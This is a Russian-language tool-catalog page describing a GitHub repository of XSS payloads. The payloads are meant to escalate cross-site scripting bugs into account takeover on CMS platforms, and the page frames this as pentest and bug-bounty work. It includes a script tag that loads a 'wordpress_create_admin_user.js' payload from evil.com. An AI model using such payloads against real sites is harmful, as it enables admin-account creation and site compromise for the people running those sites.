Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/hakluke/weaponised-xss-payloads
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS-пейлоады, предназначенные для превращения alert(1) в P1

Репозиторий
1.4k22242 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Weaponised XSS Payloads

XSS-пейлоады, созданные для превращения alert(1) в P1.

Статья в блоге

Этот репозиторий был опубликован вместе со статьёй под названием "How to Upgrade Your XSS Bugs from Medium to Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

Что это такое?

В этом репозитории вы найдёте множество JavaScript-файлов, которые можно подключить в XSS-пейлоад для выполнения чувствительных функций на популярных CMS-платформах в контексте браузера жертвы. Это помогает превратить обычный XSS-баг во что-то более критичное, например, в захват учётной записи.

Это отлично подходит для повышения серьёзности отчёта о пентесте или bug bounty за счёт демонстрации реального влияния на безопасность.

Пейлоады добавляются постепенно, по мере наличия времени. Впереди ещё много новых — если вы можете помочь, pull request'ы приветствуются! Если вы ищете вдохновение для создания новых пейлоадов — загляните во вкладку "issues" этого репозитория.

Как использовать

Самый простой способ использования этих пейлоадов — разместить их где-нибудь и подключить в атрибут src тега script вашего XSS-пейлоада, например так:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

В качестве альтернативы, в зависимости от контекста и длины пейлоада, его иногда можно , и затем просто включить напрямую в запрос.

минифицировать
закодировать

Чтобы разместить JavaScript-файл, вам может потребоваться установить Content-Type в application/javascript. Для этого с помощью PHP можно просто добавить эту строку в начало любого из пейлоадов, сохранить его как .php-файл и разместить на вашем веб-сервере с поддержкой PHP:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

Благодарности

Эта статья от Shift8 вдохновила меня на создание этого репозитория. В JS из статьи есть пара небольших опечаток, но концепции точны.

Скачать инструмент